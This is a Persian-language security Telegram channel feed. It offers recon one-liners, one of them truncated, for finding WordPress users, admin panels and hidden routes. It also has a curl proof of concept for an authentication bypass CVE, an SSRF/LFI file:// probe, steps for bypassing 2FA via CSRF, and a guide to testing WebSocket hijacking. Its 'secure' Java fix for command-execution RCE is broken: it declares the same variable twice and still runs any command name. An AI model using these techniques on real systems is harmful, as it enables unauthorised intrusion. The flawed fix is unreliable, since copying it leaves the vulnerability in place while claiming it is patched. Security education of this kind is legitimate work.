THC Release 💥: The world’s largest IP<>Domain database: https://ip.thc.org
All forward and reverse IPs, all CNAMES and all subdomains of every domain. For free.
Updated monthly.
Try: curl https://ip.thc.org/1.1.1.1
Raw data (187GB): https://ip.thc.org/docs/bulk-data-access
All forward and reverse IPs, all CNAMES and all subdomains of every domain. For free.
Updated monthly.
Try: curl https://ip.thc.org/1.1.1.1
Raw data (187GB): https://ip.thc.org/docs/bulk-data-access
برای دریافت بهروزرسانیهای امنیتی روزانه، و اخبار امنیت سایبری مارو به عنوان منبع مورد نظر خود دنبال کنید ->❤️💻
GROUP ™️
@mandegar_sec | channel
❤8🍌2
🤖 Offensive-AI-Agent-Prompts :
یه ریپو که یاد میده چطور از هوش مصنوعی به عنوان Agent امنیتی استفاده میشه ، نه فقط یه چتبات معمولی.
پرامپت ها طوری طراحی شدن که با AI تست نفوذ، تحلیل آسیبپذیری و بررسی امنیتی چجور انجام میشه .
#Ai :
ChatGPT، Gemini-CLI، DeepSeek، Cursor AI، Claude Code و Copilot
-> Pentester، Bug Hunter , Blue Team , red team
https://github.com/CyberSecurityUP/Offensive-AI-Agent-Prompts
یه ریپو که یاد میده چطور از هوش مصنوعی به عنوان Agent امنیتی استفاده میشه ، نه فقط یه چتبات معمولی.
پرامپت ها طوری طراحی شدن که با AI تست نفوذ، تحلیل آسیبپذیری و بررسی امنیتی چجور انجام میشه .
#Ai :
ChatGPT، Gemini-CLI، DeepSeek، Cursor AI، Claude Code و Copilot
-> Pentester، Bug Hunter , Blue Team , red team
https://github.com/CyberSecurityUP/Offensive-AI-Agent-Prompts
برای دریافت بهروزرسانیهای امنیتی روزانه، و اخبار امنیت سایبری مارو به عنوان منبع مورد نظر خود دنبال کنید ->❤️💻
GROUP ™️
@mandegar_sec | channel
4👍8🏆2
Mandegar SEC🎩
🤖 Offensive-AI-Agent-Prompts : یه ریپو که یاد میده چطور از هوش مصنوعی به عنوان Agent امنیتی استفاده میشه ، نه فقط یه چتبات معمولی. پرامپت ها طوری طراحی شدن که با AI تست نفوذ، تحلیل آسیبپذیری و بررسی امنیتی چجور انجام میشه . #Ai : ChatGPT، Gemini-CLI،…
وای بچه ها مرسییییییییییی واقعاااا برا استارز😍😍😍😘😘😘😘
❤6🍌4
one liner automation :😎
CSP Bypass Check :
WordPress Enumeration :
☠️ Mass PTR lookup
Exposed Admin Panels
💀 Find Hidden Admin Routes in JS
CSP Bypass Check :
cat alive.txt | httpx -silent -include-response-header | grep -i
cat urls.txt | qsreplace 'param=value1¶m=value2' | httpx -silent -mc 200WordPress Enumeration :
cat alive.txt | httpx -silent -path /wp-json/wp/v2/users -mc 200 |anew wp_users.txt☠️ Mass PTR lookup
prips 192.168.1.0/24 | xargs -P50 -I@ sh -c 'host @ 2>/dev/null | grep "pointer" | cut -d" " -f5' | sed 's/\.$//' | anew ptr_subs.txtExposed Admin Panels
cat alive.txt | httpx -silent -path /admin,/administrator,/admin.php,/wp-admin,/manager,/phpmyadmin -mc 200,301,302 | anew admin_panels.txt💀 Find Hidden Admin Routes in JS
cat js.txt | xargs -I@ curl -s @ | grep -oE "[\"\'][/][a-zA-Z0-9_/-]*(admin|dashboard|manage|config|settings|internal|private|debug|api/v[0-9])[a-zA-Z0-9_/-]*[\"\']" | tr -d "\"'" | sort -u | anew hidden_routes.txt
برای دریافت بهروزرسانیهای امنیتی روزانه، و اخبار امنیت سایبری مارو به عنوان منبع مورد نظر خود دنبال کنید ->❤️💻
GROUP ™️
@mandegar_sec | channel
❤5🍌1
CVE-2025-66489 - Authentication Bypass via TOTP Code Presence
curl -X POST http://localhost:3001/api/auth/callback/credentials
-H "Content-Type: application/x-www-form-urlencoded" \
-b cookies.txt \
-c cookies.txt \
-d "csrfToken=<TOKEN>&email=free@example.com&password=WRONG&totpCode=123456"
برای دریافت بهروزرسانیهای امنیتی روزانه، و اخبار امنیت سایبری مارو به عنوان منبع مورد نظر خود دنبال کنید ->❤️💻
GROUP ™️
@mandegar_sec | channel
❤6
sanitizer ها
ممکن است به <https://> اجازه دهند فکر کند که این یک لینک خودکار Markdown است. اما اگر به جای یک تگ anchor به صورت HTML خام رندر شود، به یک بردار XSS تبدیل میشود.
در این PoC، مرورگر یک تگ https: سفارشی ایجاد میکند و اجزای URL را به عنوان ویژگیهای HTML تجزیه میکند.
https://storage.googleapis.com/nowaskyjr/xss-url-like-poc1.html
ممکن است به <https://> اجازه دهند فکر کند که این یک لینک خودکار Markdown است. اما اگر به جای یک تگ anchor به صورت HTML خام رندر شود، به یک بردار XSS تبدیل میشود.
در این PoC، مرورگر یک تگ https: سفارشی ایجاد میکند و اجزای URL را به عنوان ویژگیهای HTML تجزیه میکند.
https://storage.googleapis.com/nowaskyjr/xss-url-like-poc1.html
برای دریافت بهروزرسانیهای امنیتی روزانه، و اخبار امنیت سایبری مارو به عنوان منبع مورد نظر خود دنبال کنید ->❤️💻
GROUP ™️
@mandegar_sec | channel
❤3👍2🏆2
اگر در حال بررسی سرور IIS ویندوز هستید
یک فایل پیشفرض وجود دارد که میتوانید از آن برای بررسی SSRF یا LFI استفاده کنید:
C:\inetpub\wwwroot\iisstart.png
example : foo?url=file:///C:/inetpub/wwwroot/iisstart.png.
یک فایل پیشفرض وجود دارد که میتوانید از آن برای بررسی SSRF یا LFI استفاده کنید:
C:\inetpub\wwwroot\iisstart.png
example : foo?url=file:///C:/inetpub/wwwroot/iisstart.png.
برای دریافت بهروزرسانیهای امنیتی روزانه، و اخبار امنیت سایبری مارو به عنوان منبع مورد نظر خود دنبال کنید ->❤️💻
GROUP ™️
@mandegar_sec | channel
👍4🏆1
the-art-of-pivoting.pdf
16.6 MB
The Art of Pivoting
تکنیک هایی برای تحلیلگران اطلاعات جهت کشف روابط جدید در جهانی پیچیده.
#pivoting #opensource #cti #threatintelligence #misp
تکنیک هایی برای تحلیلگران اطلاعات جهت کشف روابط جدید در جهانی پیچیده.
برای دریافت بهروزرسانیهای امنیتی روزانه، و اخبار امنیت سایبری مارو به عنوان منبع مورد نظر خود دنبال کنید ->❤️💻
GROUP ™️
@mandegar_sec | channel
#pivoting #opensource #cti #threatintelligence #misp
❤4🏆2
Zero Trust Security Key Concepts
برای دریافت بهروزرسانیهای امنیتی روزانه، و اخبار امنیت سایبری مارو به عنوان منبع مورد نظر خود دنبال کنید ->❤️💻
GROUP ™️
@mandegar_sec | channel
🏆3❤1🍌1
🚨 هشدار فوری
یک آسیبپذیری اجرای کد از راه دور (RCE) با شدت بحرانی (CVSS: 9.9) در پلتفرم اتوماسیون n8n شناسایی شده است.
این نقص امنیتی با شناسه CVE-2025-68613 ثبت شده و به کاربران احرازشده اجازه میدهد کد دلخواه اجرا کنند؛
موضوعی که میتواند به تصاحب کامل سرویس، دسترسی به دادهها و اجرای دستورات سیستمی منجر شود.
بر اساس گزارشها، بیش از 103 هزار نمونه در معرض اینترنت در سطح جهان شناسایی شدهاند که ریسک سوءاستفاده را بهشدت بالا میبرد.
در صورت استفاده از n8n، بررسی و اعمال اصلاحات امنیتی در اولویت فوری قرار دارد.
جزئیات بیشتر:
https://thehackernews.com/2025/12/critical-n8n-flaw-cvss-99-enables.html
#N8N #CVE_2025_68613 #RCE #SecurityAlert
یک آسیبپذیری اجرای کد از راه دور (RCE) با شدت بحرانی (CVSS: 9.9) در پلتفرم اتوماسیون n8n شناسایی شده است.
این نقص امنیتی با شناسه CVE-2025-68613 ثبت شده و به کاربران احرازشده اجازه میدهد کد دلخواه اجرا کنند؛
موضوعی که میتواند به تصاحب کامل سرویس، دسترسی به دادهها و اجرای دستورات سیستمی منجر شود.
بر اساس گزارشها، بیش از 103 هزار نمونه در معرض اینترنت در سطح جهان شناسایی شدهاند که ریسک سوءاستفاده را بهشدت بالا میبرد.
در صورت استفاده از n8n، بررسی و اعمال اصلاحات امنیتی در اولویت فوری قرار دارد.
جزئیات بیشتر:
https://thehackernews.com/2025/12/critical-n8n-flaw-cvss-99-enables.html
برای دریافت بهروزرسانیهای امنیتی روزانه، و اخبار امنیت سایبری مارو به عنوان منبع مورد نظر خود دنبال کنید ->❤️💻
GROUP ™️
@mandegar_sec | channel
#N8N #CVE_2025_68613 #RCE #SecurityAlert
2👍7🍌1
This media is not supported in the widget
VIEW IN TELEGRAM
❤5🍌3🏆2
اگه با Cloud Storageها کار میکنی، احتمالاً به rclone نیاز داری.
ابزاری برای بکاپ، سینک و مایگریشن که بهصورت rsync-like بین کلود استوریجها کار میکنه.
ریپو گیت هاب: http://github.com/rclone/rclone
ابزاری برای بکاپ، سینک و مایگریشن که بهصورت rsync-like بین کلود استوریجها کار میکنه.
ریپو گیت هاب: http://github.com/rclone/rclone
برای دریافت بهروزرسانیهای امنیتی روزانه، و اخبار امنیت سایبری مارو به عنوان منبع مورد نظر خود دنبال کنید ->❤️💻
GROUP ™️
@mandegar_sec | channel
🍌4❤3
2FA Bypass via CSRF:🍸
1. Create two Account attacker@test.com & victim@test.com
2. Login as Attacker and capture the 2FA disable request.
3.Create or Generate a CSRF PoC & save as .html
4.Now login with victim account and execute CSRF Poc.
5.2FA disabled successfully & attacker able to bypass the 2FA.
1. Create two Account attacker@test.com & victim@test.com
2. Login as Attacker and capture the 2FA disable request.
3.Create or Generate a CSRF PoC & save as .html
4.Now login with victim account and execute CSRF Poc.
5.2FA disabled successfully & attacker able to bypass the 2FA.
برای دریافت بهروزرسانیهای امنیتی روزانه، و اخبار امنیت سایبری مارو به عنوان منبع مورد نظر خود دنبال کنید ->❤️💻
GROUP ™️
@mandegar_sec | channel
❤4🍌2🏆1
🚨 یک کمپین spearphishing هدفمند :
در طول پنج ماه، ۲۷ بسته مخرب npm منتشر کرده که بهعنوان زیرساخت میزبانی پایدار برای صفحات فیشینگ اجراشونده در مرورگر عمل میکنند. این بستهها صفحات دروغین شبیه پورتالهای بهاشتراکگذاری سند و صفحه ورود مایکروسافت را نمایش میدهند و برای سرقت اطلاعات ورود کارکنان سازمانهای صنعتی و بهداشتی در آمریکا و کشورهای همپیمان طراحی شدهاند
🔎source
در طول پنج ماه، ۲۷ بسته مخرب npm منتشر کرده که بهعنوان زیرساخت میزبانی پایدار برای صفحات فیشینگ اجراشونده در مرورگر عمل میکنند. این بستهها صفحات دروغین شبیه پورتالهای بهاشتراکگذاری سند و صفحه ورود مایکروسافت را نمایش میدهند و برای سرقت اطلاعات ورود کارکنان سازمانهای صنعتی و بهداشتی در آمریکا و کشورهای همپیمان طراحی شدهاند
🔎source
برای دریافت بهروزرسانیهای امنیتی روزانه، و اخبار امنیت سایبری مارو به عنوان منبع مورد نظر خود دنبال کنید ->❤️💻
GROUP ™️
@mandegar_sec | channel
Socket
Spearphishing Campaign Abuses npm Registry to Target U.S. an...
A five-month operation turned 27 npm packages into durable hosting for browser-run lures that mimic document-sharing portals and Microsoft sign-in, ta...
2❤5🍌2🏆1
👾در اینجا مثالی از کد جاوا که در برابر حمله اجرای کد از راه دور (RCE) آسیبپذیر میباشد، آورده شده.👾
🥺 Vulnerable Code :
این برنامه از متد"Runtime.getRuntime().exec()" برای اجرای یک دستور سیستمی که به عنوان آرگومان به برنامه ارسال میشود، استفاده میکند. این دستور از طریق پارامتر "args[0]" که برای مهاجم قابل دسترسی است، به برنامه ارسال میشود.
😎 Secure Code :
در اینجا نسخهای از همان کد وجود دارد که در برابر حمله اجرای کد از راه دور (RCE) ایمن شده است :
در کد اصلی آسیب پذیر بود، به مهاجم اجازه میدهد تا کد دلخواهی را بر روی سرور اجرا کند. در کد امن، ورودی کاربر ابتدا با یک الگوی regex بررسی میشود تا مطمئن بشود این ورودی واقعا یه دستور مجازه، بعد اجراش کند
#secure_coding #bug_bounty #bugbounty
🥺 Vulnerable Code :
import java.io.*;
public class RCE {
public static void main(String[] args) throws Exception {
// Vulnerable code: user input is directly passed to the system command
Process p = Runtime.getRuntime().exec(args[0]); // args[0] can be manipulated by attacker
BufferedReader in = new BufferedReader(new InputStreamReader(p.getInputStream()));
String line;
while ((line = in.readLine()) != null) {
System.out.println(line);
}
}
}
این برنامه از متد"Runtime.getRuntime().exec()" برای اجرای یک دستور سیستمی که به عنوان آرگومان به برنامه ارسال میشود، استفاده میکند. این دستور از طریق پارامتر "args[0]" که برای مهاجم قابل دسترسی است، به برنامه ارسال میشود.
😎 Secure Code :
در اینجا نسخهای از همان کد وجود دارد که در برابر حمله اجرای کد از راه دور (RCE) ایمن شده است :
import java.io.*;
import java.util.regex.*;
public class RCE {
public static void main(String[] args) throws Exception {
// Secure code: user input is sanitized using regex to only allow approved commands
String pattern = "^[A-Za-z0-9_-]*$"; // regex for approved commands
Pattern p = Pattern.compile(pattern);
Matcher m = p.matcher(args[0]);
if (!m.matches()) {
System.out.println("Invalid command");
return;
}
Process p = Runtime.getRuntime().exec(args[0]);
BufferedReader in = new BufferedReader(new InputStreamReader(p.getInputStream()));
String line;
while ((line = in.readLine()) != null) {
System.out.println(line);
}
}
}
“Process p = Runtime.getRuntime().exec(args[0]);”
در کد اصلی آسیب پذیر بود، به مهاجم اجازه میدهد تا کد دلخواهی را بر روی سرور اجرا کند. در کد امن، ورودی کاربر ابتدا با یک الگوی regex بررسی میشود تا مطمئن بشود این ورودی واقعا یه دستور مجازه، بعد اجراش کند
برای دریافت بهروزرسانیهای امنیتی روزانه، و اخبار امنیت سایبری مارو به عنوان منبع مورد نظر خود دنبال کنید ->❤️💻
GROUP ™️
@mandegar_sec | channel
#secure_coding #bug_bounty #bugbounty
1❤4👍2
Forwarded from Hack Hive
بازم سلام👀
چند وقت وقت مفصل راجب وب سوکت بهتون گفتم اما هیچی راجب آسیب پذیری هاش نگفتیم صرفا نحوه کارش بود تا اینکه با یه وب سوکت خیلی نچسب رو به رو شدم 🫠
حالا بیاید با هم برسی کنیم بیشتر آسیب هایی که روی وب سوکت میخوره چیا هست؟ از کجا بفهمیم یه سامانه وب سوکت استفاده میکنه؟ چطوری باهاش برخورد کنیم؟
وب سوکت یا websocket برای ارتباط در لحظه اس مثلا مسینجر ها اما فقط توی ارتباط های درلحظه استفاده نمیشه!
میتونه حتی برای احراز هویت افراد یا انتقال دیتای اونا استفاده بشه👾
اما چطور بفهمیم سامانه داره از وب سوکت استفاده میکنه؟
وقتی داریم درخواست های از proxy خودمون رد میکنیم و یکی یکی ریکوئست هارو چک میکنیم یهو میبینی برای یه درخواست ساعت باید ۱۰ تا ریکوئست رد کنی! اون هیچی خب میگی یه وقتایی پیاده سازی ها به این شکل هستش اما میبینی توی هدر نوشته ws/ یا wss/ و اینجا جالب میشه:)
اینجا همون end point هست که ما میخوایم با وب سوکت ارتباط بگیریم و صداش کنیم تو این لحظه خودش چک لیست زیادی داره! مثلا حمله dos یا race condition خیلی رایجه تو وب سوکت و خیلی باحاله که ارسال درخواست بدون authentication توی وب سوکت خیلی مهمه چون اینجا با داده های حساسی سر و کار داری!
*اینو قبل از شروع برسی یکی از آسیب پذیری هاش بگم که کلی گشتم به نظرم بهتر از این مقاله برای توضیح آسیب های رایج وب سوکت پیدا نمیشه ... پست های دیگه اش هم حتما برسی کنید😉
آسیب پذیری مد نظر ما اسمش هست CSWSH! قبول دارم اسمش ترسناکه اما تستش خیلی راحته😅
وقتی درخواستی که ما میفرستیم پارامتر origin به درستی برسی نشه میتونیم مقدارش رو تغییر بدیم و بتونیم این درخواست رو از دامنه دیگه ای بزنیم اما خب چرا اصلا باید مهم باشه؟
بزار اسم کاملش رو بگم:
Cross-site websocket hijacking
فکر کنم راحت تر بفهمی دقیقا چرا مهمه! چون میتونه با ساختن یه فرم جعلی یا صفحه مشابه به ما کاربر رو فریب بده که درخواست بزنه با وب سوکت و ارتباط بگیره و تمام دیتایی که منتقل میشه برای ما قابل مشاهده باشه :)
پس ساده ترین کار ممکن وقتی یه وب سوکت دیدید اینه که با همون برپ خوشگلت تست کنی اتفاقا خیلی هم راحته!
کافیه بری بخش رپیتر بعد یه تب websocket باز کنید و یکی از درخواست های وب سوکت رو انتخاب کنیم حالا از هدر ها بخش origin رو خالی بزارید یا یه آدرس دیگه بهش بدید🤷🏻♀️
وقتی مسیج رو send کنید و جواب بگیرید و بتونیم ارتباط بگیرید ... بهتره سریع گزارشش کنی☺️
برای تمرین هم این لابراتور ها بد نیست که نگاهی بندازید حتی خودتون بالا بیارید و تست کنید🫧
@Hackhive_channel 🐝
چند وقت وقت مفصل راجب وب سوکت بهتون گفتم اما هیچی راجب آسیب پذیری هاش نگفتیم صرفا نحوه کارش بود تا اینکه با یه وب سوکت خیلی نچسب رو به رو شدم 🫠
حالا بیاید با هم برسی کنیم بیشتر آسیب هایی که روی وب سوکت میخوره چیا هست؟ از کجا بفهمیم یه سامانه وب سوکت استفاده میکنه؟ چطوری باهاش برخورد کنیم؟
وب سوکت یا websocket برای ارتباط در لحظه اس مثلا مسینجر ها اما فقط توی ارتباط های درلحظه استفاده نمیشه!
میتونه حتی برای احراز هویت افراد یا انتقال دیتای اونا استفاده بشه👾
اما چطور بفهمیم سامانه داره از وب سوکت استفاده میکنه؟
وقتی داریم درخواست های از proxy خودمون رد میکنیم و یکی یکی ریکوئست هارو چک میکنیم یهو میبینی برای یه درخواست ساعت باید ۱۰ تا ریکوئست رد کنی! اون هیچی خب میگی یه وقتایی پیاده سازی ها به این شکل هستش اما میبینی توی هدر نوشته ws/ یا wss/ و اینجا جالب میشه:)
اینجا همون end point هست که ما میخوایم با وب سوکت ارتباط بگیریم و صداش کنیم تو این لحظه خودش چک لیست زیادی داره! مثلا حمله dos یا race condition خیلی رایجه تو وب سوکت و خیلی باحاله که ارسال درخواست بدون authentication توی وب سوکت خیلی مهمه چون اینجا با داده های حساسی سر و کار داری!
*اینو قبل از شروع برسی یکی از آسیب پذیری هاش بگم که کلی گشتم به نظرم بهتر از این مقاله برای توضیح آسیب های رایج وب سوکت پیدا نمیشه ... پست های دیگه اش هم حتما برسی کنید😉
آسیب پذیری مد نظر ما اسمش هست CSWSH! قبول دارم اسمش ترسناکه اما تستش خیلی راحته😅
وقتی درخواستی که ما میفرستیم پارامتر origin به درستی برسی نشه میتونیم مقدارش رو تغییر بدیم و بتونیم این درخواست رو از دامنه دیگه ای بزنیم اما خب چرا اصلا باید مهم باشه؟
بزار اسم کاملش رو بگم:
Cross-site websocket hijacking
فکر کنم راحت تر بفهمی دقیقا چرا مهمه! چون میتونه با ساختن یه فرم جعلی یا صفحه مشابه به ما کاربر رو فریب بده که درخواست بزنه با وب سوکت و ارتباط بگیره و تمام دیتایی که منتقل میشه برای ما قابل مشاهده باشه :)
پس ساده ترین کار ممکن وقتی یه وب سوکت دیدید اینه که با همون برپ خوشگلت تست کنی اتفاقا خیلی هم راحته!
کافیه بری بخش رپیتر بعد یه تب websocket باز کنید و یکی از درخواست های وب سوکت رو انتخاب کنیم حالا از هدر ها بخش origin رو خالی بزارید یا یه آدرس دیگه بهش بدید🤷🏻♀️
وقتی مسیج رو send کنید و جواب بگیرید و بتونیم ارتباط بگیرید ... بهتره سریع گزارشش کنی☺️
برای تمرین هم این لابراتور ها بد نیست که نگاهی بندازید حتی خودتون بالا بیارید و تست کنید🫧
@Hackhive_channel 🐝
Ably Realtime
WebSocket security: How to prevent 9 common vulnerabilities
Discover common WebSocket vulnerabilities and learn how to secure your WebSocket connections with modern security practices, encryption, and vulnerability testing.
1❤3👍2🍌2🏆1